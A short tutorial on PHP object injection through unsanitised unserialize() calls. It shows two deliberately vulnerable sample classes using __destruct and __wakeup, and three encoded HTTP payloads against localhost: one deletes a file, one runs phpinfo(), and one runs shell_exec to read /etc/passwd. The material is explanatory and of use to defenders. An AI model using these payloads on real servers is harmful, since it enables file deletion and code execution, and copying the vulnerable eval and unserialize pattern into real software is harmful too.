Unserialize PHP exploit is a kind of PHP Object injection. This exploit will occur when a user defined input is not being sanitized properly before being passed to unseriliaze function.
For this exploit to work, you need to take advantage of PHP’s magic methods like __destruct or __wakeup.
See examples below:
For example you have this class named Sample1 with a __desctruct method in it.
class Sample1 { private $file; public function __construct() { // SOME PHP CODES HERE } public function __destruct() { $file = '/tmp/'.$this->file; if(file_exists($file)) { return unlink($file); } } } // SOME PHP CODE HERE unserialize($_GET['data']);
As you can see on the example above, the code unserialize’s $_GET['data']
which is a user defined input without any validation. Attacker might be able to delete file using Path Traversal attack.
All we need to do here is set a malicious string on the data parameter to make this exploit work. See malicious payload below.
GET /Sample1.php?data=O%3A8%3A%22Sample1%22%3A1%3A%7Bs%3A14%3A%22%00Sample1%00file%22%3Bs%3A8%3A%22test.txt%22%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token
This particular payload will set Sample1’s $file
to test.txt
and then trigger the __destruct method which then proceeds to delete test.txt on /tmp directory.
Now check our second example with __wakeup
magic method.
class Sample2 { private $cmd; public function __construct() { // SOME PHP CODE } public function __wakeup() { if($this->cmd) { eval($this->cmd); } } } // SOME PHP CODE unserialize($_GET['data']);
In this example, attacker might be able to execute PHP commands by sending a malicious payload. Check payload below.
GET /Sample2.php?data=O%3A7%3A%22Sample2%22%3A1%3A%7Bs%3A12%3A%22%00Sample2%00cmd%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token
This particular payload will simply execute phpinfo();
. But with a little tweak on our payload, we can basically do almost everything on their server. Check sample payload below which will display the content of /etc/passwd file.
GET /Sample2.php?data=O%3A7%3A"Sample2"%3A1%3A%7Bs%3A12%3A"%00Sample2%00cmd"%3Bs%3A36%3A"print+shell_exec%28%27cat+%2Fetc%2Fpasswd%27%29%3B"%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token
Basically, with this flaw, the attacker can play GOD Mode on the victims Application. That’s how serious this vulnerability is.
This vulnerability is available on PHP 5.3 and higher.